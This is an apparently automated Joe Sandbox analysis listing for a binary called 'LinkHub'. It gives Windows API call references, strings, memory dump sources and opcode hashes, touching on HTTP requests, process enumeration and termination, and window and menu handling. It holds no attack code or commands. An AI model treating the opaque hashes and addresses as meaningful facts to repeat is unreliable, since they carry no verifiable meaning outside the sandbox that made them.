                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: d94dc37f5827bb5ba527e92ab2e2413e365dc7c1e6caf29b00db5e630335aae9
                                                                    • Instruction ID: 8e0bd272e07c662805acabb505ebbb3fd356e4e6e0c68171b4b089b1f08a5168
                                                                    • Opcode Fuzzy Hash: d94dc37f5827bb5ba527e92ab2e2413e365dc7c1e6caf29b00db5e630335aae9
                                                                    • Instruction Fuzzy Hash: B311897A500119BFCB01EF98C842DDD3B65EF06354B9145A5F908AF222DB31DE51EB50
                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CE89F2
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8A06
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00CE8A30
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CE8A4A
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8A5C
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8AA5
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CE8AF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                    • String ID: *.*
                                                                    • API String ID: 769691225-438819550
                                                                    • Opcode ID: ee474edc590153b6da0d0f3f46d9fd2aea658d6d5ddff47dc13b9b5b00c99712
                                                                    • Instruction ID: 73c28f7d17dcda6358a6ba8aba0f2b3031e20da76f284cd8c14d2d0f373939b1
                                                                    • Opcode Fuzzy Hash: ee474edc590153b6da0d0f3f46d9fd2aea658d6d5ddff47dc13b9b5b00c99712
                                                                    • Instruction Fuzzy Hash: AE81BF729043849FCB24EF56C444ABAB3E8BF84310F58482AF99DD7251DF34DA499B92
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00C774D7
                                                                      • Part of subcall function 00C77567: GetClientRect.USER32(?,?), ref: 00C7758D
                                                                      • Part of subcall function 00C77567: GetWindowRect.USER32(?,?), ref: 00C775CE
                                                                      • Part of subcall function 00C77567: ScreenToClient.USER32(?,?), ref: 00C775F6
                                                                    • GetDC.USER32 ref: 00CB6083
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00CB6096
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00CB60A4
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00CB60B9
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00CB60C1
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00CB6152
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: a380b7988c3abc7ce8970872ba5798983385a0fbf17f4b5e873ccea791a934d2
                                                                    • Instruction ID: b6385b116f0e99b4e5c475db774604b2e5edb84730163fc130dbca7e02cbacd3
                                                                    • Opcode Fuzzy Hash: a380b7988c3abc7ce8970872ba5798983385a0fbf17f4b5e873ccea791a934d2
                                                                    • Instruction Fuzzy Hash: 6971B231504209DFCF259F68DC84AFE7BB5FF49310F14826AED699A2A6C7358940DF60
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                      • Part of subcall function 00C719CD: GetCursorPos.USER32(?), ref: 00C719E1
                                                                      • Part of subcall function 00C719CD: ScreenToClient.USER32(00000000,?), ref: 00C719FE
                                                                      • Part of subcall function 00C719CD: GetAsyncKeyState.USER32(00000001), ref: 00C71A23
                                                                      • Part of subcall function 00C719CD: GetAsyncKeyState.USER32(00000002), ref: 00C71A3D
                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00D095C7
                                                                    • ImageList_EndDrag.COMCTL32 ref: 00D095CD
                                                                    • ReleaseCapture.USER32 ref: 00D095D3
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00D0966E
                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00D09681
                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00D0975B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                    • API String ID: 1924731296-2107944366
                                                                    • Opcode ID: b397d45d8b6fd813aa62234cf90eb8007c901d895bb77da8d65f12fa461b5008
                                                                    • Instruction ID: 079708eac7f41c17ee37fd76b883e159c0ebbf147a19785aeab276b63aaabaf9
                                                                    • Opcode Fuzzy Hash: b397d45d8b6fd813aa62234cf90eb8007c901d895bb77da8d65f12fa461b5008
                                                                    • Instruction Fuzzy Hash: B7517A75104304AFD704EF24CC5AFAA77E5FB88714F400A2DF99A972E2DB719908DB62
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CECCB7
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CECCDF
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CECD0F
                                                                    • GetLastError.KERNEL32 ref: 00CECD67
                                                                    • SetEvent.KERNEL32(?), ref: 00CECD7B
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00CECD86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3113390036-3916222277
                                                                    • Opcode ID: ef4f3f02999ffa7d8fd976c47f78c4a3c048f836d53d557b114de3de4116cf87
                                                                    • Instruction ID: d6747373264586bf17ac7c454b38dc9fa033c7b0696531b9e0e5cc83fddfd378
                                                                    • Opcode Fuzzy Hash: ef4f3f02999ffa7d8fd976c47f78c4a3c048f836d53d557b114de3de4116cf87
                                                                    • Instruction Fuzzy Hash: 91317F71500788AFD721AFA68CC8AAB7BFDEB45740B10452AF45AD3200DB35DE059B71
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00CB55AE,?,?,Bad directive syntax error,00D0DCD0,00000000,00000010,?,?), ref: 00CDA236
                                                                    • LoadStringW.USER32(00000000,?,00CB55AE,?), ref: 00CDA23D
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CDA301
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 858772685-4153970271
                                                                    • Opcode ID: ce97d167c2d6a779df3933aa49dede153db77bc77357399290bbae2e688fba50
                                                                    • Instruction ID: 6f0b8801e6329d2c90e76ecd08e056569f2ef05affeab3db3e99ca7860bf16cb
                                                                    • Opcode Fuzzy Hash: ce97d167c2d6a779df3933aa49dede153db77bc77357399290bbae2e688fba50
                                                                    • Instruction Fuzzy Hash: 4B21657180061EEFCF11AFA0CC06EEE7B39BF18700F044456F519651A2EB719A58EB21
                                                                    APIs
                                                                    • GetParent.USER32 ref: 00CD29F8
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00CD2A0D
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CD2A9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1290815626-3381328864
                                                                    • Opcode ID: 50d477d6d7161b7be3069d2b6d20fac8aa6a5b525702e236b51e77dc953bb17a
                                                                    • Instruction ID: 2e77333cc521821d8a6a59fcd28c52e6d6afe4b14f87848764154a8099e59bc7
                                                                    • Opcode Fuzzy Hash: 50d477d6d7161b7be3069d2b6d20fac8aa6a5b525702e236b51e77dc953bb17a
                                                                    • Instruction Fuzzy Hash: E411067B244307BDFA286621DC0ADA6779CCF25724B604013F60CE51D1FB62A9017924
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 00C7758D
                                                                    • GetWindowRect.USER32(?,?), ref: 00C775CE
                                                                    • ScreenToClient.USER32(?,?), ref: 00C775F6
                                                                    • GetClientRect.USER32(?,?), ref: 00C7773A
                                                                    • GetWindowRect.USER32(?,?), ref: 00C7775B
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$Screen
                                                                    • String ID:
                                                                    • API String ID: 1296646539-0
                                                                    • Opcode ID: bc6277efad86723cd5b87ec49273fd11f3db273863ce282228852b8a1369b2dd
                                                                    • Instruction ID: c9d1811f606af665d71f424fc95f4944810e86c3f0000143a685ed1c5f234b71
                                                                    • Opcode Fuzzy Hash: bc6277efad86723cd5b87ec49273fd11f3db273863ce282228852b8a1369b2dd
                                                                    • Instruction Fuzzy Hash: 01C16B3990464AEFDB10CFA9C540BEDB7F1FF18310F14851AE8A9E7250D734AA51DB60
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                    • String ID:
                                                                    • API String ID: 1282221369-0
                                                                    • Opcode ID: 5f3aecd92c875a004daacace096ae69c4f4c04468c808821689057a128f3ee8f
                                                                    • Instruction ID: d6f7d86baf717aa069b452e3c2c3130439ff95baf8d1c9b29d54085f0744fcc1
                                                                    • Opcode Fuzzy Hash: 5f3aecd92c875a004daacace096ae69c4f4c04468c808821689057a128f3ee8f
                                                                    • Instruction Fuzzy Hash: FF6137B5D01313AFDF21AFB8D8417AE7BA49F03328B04026DE957E7652D7319E40D661
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00D05C24
                                                                    • ShowWindow.USER32(?,00000000), ref: 00D05C65
                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00D05C6B
                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00D05C6F
                                                                      • Part of subcall function 00D079F2: DeleteObject.GDI32(00000000), ref: 00D07A1E
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D05CAB
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D05CB8
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00D05CEB
                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00D05D25
                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00D05D34
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                    • String ID:
                                                                    • API String ID: 3210457359-0
                                                                    • Opcode ID: d4d7c6e8718bcfc5c9eab4a4cde7b268a3fe9d620863f468032eb7ff23436bb8
                                                                    • Instruction ID: 33c9d0ab5f3e457c1bc004193918d80005dbb691086c006fa3bff557e41beab9
                                                                    • Opcode Fuzzy Hash: d4d7c6e8718bcfc5c9eab4a4cde7b268a3fe9d620863f468032eb7ff23436bb8
                                                                    • Instruction Fuzzy Hash: 7051B034640B08BFEF249F55EC49B9A3B65EB04350F188112FE1D9A2E4C775A990DF71
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00CB28D1
                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00CB28EA
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00CB28FA
                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00CB2912
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00CB2933
                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C711F5,00000000,00000000,00000000,000000FF,00000000), ref: 00CB2942
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00CB295F
                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C711F5,00000000,00000000,00000000,000000FF,00000000), ref: 00CB296E
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                    • String ID:
                                                                    • API String ID: 1268354404-0
                                                                    • Opcode ID: 5414c7d0e7a6c95283487d50c85344c63fbc49d4682e081b14106048140b9679
                                                                    • Instruction ID: 4d8c7bfeb5f4933de7718bb8f677ca2633cccdb5c38aa3d84417a4fd95f62629
                                                                    • Opcode Fuzzy Hash: 5414c7d0e7a6c95283487d50c85344c63fbc49d4682e081b14106048140b9679
                                                                    • Instruction Fuzzy Hash: 3C514B30A00305AFDB24DF69CC45BAA7BB6FF48760F148519F95AE72A0D770E950EB50
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CECBC7
                                                                    • GetLastError.KERNEL32 ref: 00CECBDA
                                                                    • SetEvent.KERNEL32(?), ref: 00CECBEE
                                                                      • Part of subcall function 00CECC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CECCB7
                                                                      • Part of subcall function 00CECC98: GetLastError.KERNEL32 ref: 00CECD67
                                                                      • Part of subcall function 00CECC98: SetEvent.KERNEL32(?), ref: 00CECD7B
                                                                      • Part of subcall function 00CECC98: InternetCloseHandle.WININET(00000000), ref: 00CECD86
                                                                    Similarity
                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 337547030-0
                                                                    • Opcode ID: 7fc88907922ac7e2b8e1107549b0ccd76902c81afe9e45975ffa3ba86559a531
                                                                    • Instruction ID: 3ab2bf22ee1f335aed7d51c61a8e21d94d6578293a0d2394bca3fc5c30400654
                                                                    • Opcode Fuzzy Hash: 7fc88907922ac7e2b8e1107549b0ccd76902c81afe9e45975ffa3ba86559a531
                                                                    • Instruction Fuzzy Hash: 11318B71100781AFCB218FB6CD84A6ABBB9FF44300B20452EF86EC6610C730E916AB60
                                                                    APIs
                                                                      • Part of subcall function 00CD4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD43AD
                                                                      • Part of subcall function 00CD4393: GetCurrentThreadId.KERNEL32 ref: 00CD43B4
                                                                      • Part of subcall function 00CD4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CD2F00), ref: 00CD43BB
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD2F0A
                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CD2F28
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00CD2F2C
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD2F36
                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CD2F4E
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00CD2F52
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD2F5C
                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CD2F70
                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00CD2F74
                                                                    Similarity
                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                    • String ID:
                                                                    • API String ID: 2014098862-0
                                                                    • Opcode ID: 2332391b8a96a0daa72c68ab5e54314e9716f0602a0ccc8a6152669a037fe965
                                                                    • Instruction ID: 002a93e283be63c50a1f48ca5c049ab605c92eb1794ab68f83fcd9c8468bcbf6
                                                                    • Opcode Fuzzy Hash: 2332391b8a96a0daa72c68ab5e54314e9716f0602a0ccc8a6152669a037fe965
                                                                    • Instruction Fuzzy Hash: 8F01B5306843147BFB106BA99C8AF597F6ADB5DB11F100016F318EE2E0C9F254449ABA
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00CD1D95,?,?,00000000), ref: 00CD2159
                                                                    • HeapAlloc.KERNEL32(00000000,?,00CD1D95,?,?,00000000), ref: 00CD2160
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CD1D95,?,?,00000000), ref: 00CD2175
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00CD1D95,?,?,00000000), ref: 00CD217D
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00CD1D95,?,?,00000000), ref: 00CD2180
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CD1D95,?,?,00000000), ref: 00CD2190
                                                                    • GetCurrentProcess.KERNEL32(00CD1D95,00000000,?,00CD1D95,?,?,00000000), ref: 00CD2198
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00CD1D95,?,?,00000000), ref: 00CD219B
                                                                    • CreateThread.KERNEL32(00000000,00000000,00CD21C1,00000000,00000000,00000000), ref: 00CD21B5
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: 79e196f790e046f78133f249f08718254f99ef464a9ff0d5cca5755c05a25f39
                                                                    • Instruction ID: 6f18159091a6c95ab286ba80dc5d0788a979617691a3b623dda31d359cd21605
                                                                    • Opcode Fuzzy Hash: 79e196f790e046f78133f249f08718254f99ef464a9ff0d5cca5755c05a25f39
                                                                    • Instruction Fuzzy Hash: 3B01BBB5240304BFE710AFA5DC4DF6B7BADEB88711F008416FA09DB2A1CA709800CB31
                                                                    APIs
                                                                      • Part of subcall function 00CDDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00CDDDAC
                                                                      • Part of subcall function 00CDDD87: Process32FirstW.KERNEL32(00000000,?), ref: 00CDDDBA
                                                                      • Part of subcall function 00CDDD87: CloseHandle.KERNELBASE(00000000), ref: 00CDDE87
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CFABCA
                                                                    • GetLastError.KERNEL32 ref: 00CFABDD
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CFAC10
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CFACC5
                                                                    • GetLastError.KERNEL32(00000000), ref: 00CFACD0
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFAD21
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: 9cfe7468a57864307f56bda0d12ce7ad522fda1829682adc2b4d1136c28dc7f9
                                                                    • Instruction ID: d968fc33d4de66d5ff2a4867bf53d55e1fcb3cbc916e08dd57047fb61222a21a
                                                                    • Opcode Fuzzy Hash: 9cfe7468a57864307f56bda0d12ce7ad522fda1829682adc2b4d1136c28dc7f9
                                                                    • Instruction Fuzzy Hash: 5761BCB4208246AFD360DF15C494F25BBE1AF44308F18849DE56A8BBA3C772ED45CB92
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00D043C1
                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00D043D6
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00D043F0
                                                                    • _wcslen.LIBCMT ref: 00D04435
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00D04462
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00D04490
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcslen
                                                                    • String ID: SysListView32
                                                                    • API String ID: 2147712094-78025650
                                                                    • Opcode ID: 5abb1eb6fa853b3d058b80d9cb62273c0e517ebee24313a549d47bfcaa5d3d6b
                                                                    • Instruction ID: 3d8908fa36fa517d17810c433f4b88299a25442bda33ae040e7eea37fb90972e
                                                                    • Opcode Fuzzy Hash: 5abb1eb6fa853b3d058b80d9cb62273c0e517ebee24313a549d47bfcaa5d3d6b
                                                                    • Instruction Fuzzy Hash: 8041A071900319ABDB219FA4CC49FEA7BA9EF48350F140126FA48E72D1D775D980DBA0
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CDC6C4
                                                                    • IsMenu.USER32(00000000), ref: 00CDC6E4
                                                                    • CreatePopupMenu.USER32 ref: 00CDC71A
                                                                    • GetMenuItemCount.USER32(011C56E0), ref: 00CDC76B
                                                                    • InsertMenuItemW.USER32(011C56E0,?,00000001,00000030), ref: 00CDC793
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                    • String ID: 0$2
                                                                    • API String ID: 93392585-3793063076
                                                                    • Opcode ID: f552e3c984c2042a606b6160a3b1771ed15b229d8df41fa07fbfcc4b76ede88e
                                                                    • Instruction ID: 8e3773cf7958f26c4cf6ef47a6ed0441d24cc31ce4e68e93e328b5e16747cfe8
                                                                    • Opcode Fuzzy Hash: f552e3c984c2042a606b6160a3b1771ed15b229d8df41fa07fbfcc4b76ede88e
                                                                    • Instruction Fuzzy Hash: C4519F70A002069BDF10CFA8C8C8BAEBBF5AF55314F25411BEA25D7391D7709A41CF61
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00CDD1BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 422590e02f7cac88344c0d2e6c5808c4452e7c2d8f4e755875181291d3d0da01
                                                                    • Instruction ID: 983dcfef911515a403534f1e5f60eb58eb0cb808a01f629bc718df3930866373
                                                                    • Opcode Fuzzy Hash: 422590e02f7cac88344c0d2e6c5808c4452e7c2d8f4e755875181291d3d0da01
                                                                    • Instruction Fuzzy Hash: 1611E476A49707BEEB055A55DC82DAE77ACDF05770F20002BFA06A6381E7B0AB415170
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
